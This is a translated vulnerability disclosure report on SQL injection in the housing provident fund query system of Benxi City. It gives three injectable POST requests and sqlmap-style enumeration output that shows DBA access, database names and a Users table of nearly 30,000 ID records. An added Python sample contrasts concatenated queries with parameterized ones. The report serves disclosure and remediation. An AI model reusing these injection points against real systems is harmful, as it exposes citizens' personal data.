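2015-10-30: Details reported to the vendor; awaiting vendor handling
2015-11-03: Vendor confirmed; details disclosed to the vendor only
2015-11-13: Details disclosed to core white hats and experts in related fields
2015-11-23: Details disclosed to regular white hats
2015-12-03: Details disclosed to intern white hats
2015-12-18: Details disclosed to the public

As per the title.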
A bundle of SQL injections in the housing provident fund query system of Benxi City, Liaoning Province; nearly 30,000 user records exposed.

First instance:

POST /index.aspx HTTP/1.1
Content-Length: 546
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

queryBtn=%e6%9f%a5%c2%a0%e8%af%a2&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAWFGPDFx%2biwix4ucGbJMWHBIzXvzffmx436DR9Xc/o2DCAwoBLQ1momdihx35Zu8uukYCTy/gpHrfKE6XIneSqJzfg78Z8BXhXifTCAVkevd1oD6Cgt5Loi59xANbE/5SdjIinmBJ6/Gb/2asYNCzXP&__VIEWSTATE=/wEPDwUJNTEyNTM3NTEyD2QWAgIBD2QWAgILDzwrABECARAWABYAFgAMFCsAAGQYAQUJR3JpZFZpZXcxD2dkV%2bGYGvRyPGH9AmcIqIy4VSMnZp9rZf9y2%2b7O6PVrz5Q%3d

The sfzh and zgxm parameters are vulnerable to SQL injection.
Second instance:

POST / HTTP/1.1
Content-Length: 546
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

queryBtn=%e6%9f%a5%c2%a0%e8%af%a2&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAWFGPDFx%2biwix4ucGbJMWHBIzXvzffmx436DR9Xc/o2DCAwoBLQ1momdihx35Zu8uukYCTy/gpHrfKE6XIneSqJzfg78Z8BXhXifTCAVkevd1oD6Cgt5Loi59xANbE/5SdjIinmBJ6/Gb/2asYNCzXP&__VIEWSTATE=/wEPDwUJNTEyNTM3NTEyD2QWAgIBD2QWAgILDzwrABECARAWABYAFgAMFCsAAGQYAQUJR3JpZFZpZXcxD2dkV%2bGYGvRyPGH9AmcIqIy4VSMnZp9rZf9y2%2b7O6PVrz5Q%3d

The sfzh and zgxm parameters are vulnerable to SQL injection.
Third instance:

POST /register.aspx HTTP/1.1
Content-Length: 627
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

registerBtn=%e6%b3%a8%c2%a0%c2%a0%c2%a0%c2%a0%e5%86%8c&pass=g00dPa%24%24w0rD&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAZRmGJVbl4%2bqQgcx%2bUO1OvOIzXvzffmx436DR9Xc/o2DN4Xcj%2byyOoBNCPOW5xUI%2bKkYCTy/gpHrfKE6XIneSqJRvgmDPsecjMqPv%2bQuIhFOz9YyyR4qjX0bKJ2X6bXV1M3D7YNVcJt1JmWHwjU3esh2SFgaZ0znnKZixmtnJT4fA%3d%3d&__VIEWSTATE=/wEPDwULLTEzNzQxMTAyNjcPZBYCAgEPZBYCAg0PPCsAEQIBEBYAFgAWAAwUKwAAZBgBBQlHcmlkVmlldzEPZ2T9QyhU4uvJFNN7Anm79hUb/wmiWUJCFsQI8LXnG1EzXQ%3d%3d

The sfzh parameter is vulnerable to SQL injection.
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
current database: 'zfgjj'
current user is DBA: True
available databases [11]:
[*] bxip
[*] bxrc
[*] Changan_db
[*] master
[*] model
[*] msdb
[*] NDRC_DB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zfgjj

Database: zfgjj
[12 tables]
+--------------+
| GJJ20150131  |
| GJJ20150228  |
| GJJ20150301  |
| GJJ20150331  |
| GJJ20150430  |
| GJJ20150531  |
| GJJ20150630  |
| GJJ20150731  |
| GJJ20150831  |
| Users        |
| sqlmapoutput |
| test_1       |
+--------------+

Database: zfgjj
Table: Users
[2 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
| sfzh     | varchar |
+----------+---------+

Database: zfgjj
Table: Users
[29988 entries]
Filter the input parameters and use parameterized queries. Requesting a rank of 20.
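
An added example, not part of the original report or the site's code: the two fixes requested above (input filtering and parameterized queries) shown next to the string-concatenation pattern they replace. Python's sqlite3 stands in for the ASP.NET/SQL Server stack; the fund_accounts table, the sample rows, and the reading of sfzh as an 18-character ID number are assumptions.

```python
import re
import sqlite3

# Assumption: sfzh is an 18-character ID number (17 digits, then a digit or X).
SFZH_RE = re.compile(r"\d{17}[\dXx]", re.ASCII)


def make_db():
    """In-memory stand-in for the back-end database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE fund_accounts (sfzh TEXT PRIMARY KEY, zgxm TEXT)")
    db.executemany(
        "INSERT INTO fund_accounts VALUES (?, ?)",
        [("000000000000000001", "Zhang San"), ("000000000000000002", "Li Si")],
    )
    return db


def query_concat(db, sfzh, zgxm):
    """Vulnerable pattern: request values are spliced into the SQL text."""
    sql = (
        "SELECT sfzh, zgxm FROM fund_accounts "
        "WHERE sfzh = '" + sfzh + "' AND zgxm = '" + zgxm + "'"
    )
    return db.execute(sql).fetchall()


def query_safe(db, sfzh, zgxm):
    """Hardened pattern: validate the format, then bind values as parameters."""
    if not SFZH_RE.fullmatch(sfzh) or not 0 < len(zgxm) <= 32:
        raise ValueError("invalid query input")
    sql = "SELECT sfzh, zgxm FROM fund_accounts WHERE sfzh = ? AND zgxm = ?"
    return db.execute(sql, (sfzh, zgxm)).fetchall()


if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"  # constructed input containing a quote
    # Concatenation lets the value rewrite the WHERE clause: every row matches.
    print(len(query_concat(db, "000000000000000001", crafted)))
    # Bound as a parameter, the same value is only a name that matches nothing.
    print(query_safe(db, "000000000000000001", crafted))
    print(query_safe(db, "000000000000000001", "Zhang San"))
    try:
        query_safe(db, crafted, "Zhang San")  # fails format validation
    except ValueError as exc:
        print("rejected:", exc)
```

In ASP.NET the same pattern is a SqlCommand whose values are supplied through SqlParameter objects instead of being concatenated into the command text.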
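Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-03 14:51
CNVD confirmed and reproduced the reported vulnerability and has forwarded it through CNCERT to the corresponding regional sub-center, which will coordinate remediation with the organization that operates the site.
None at this time.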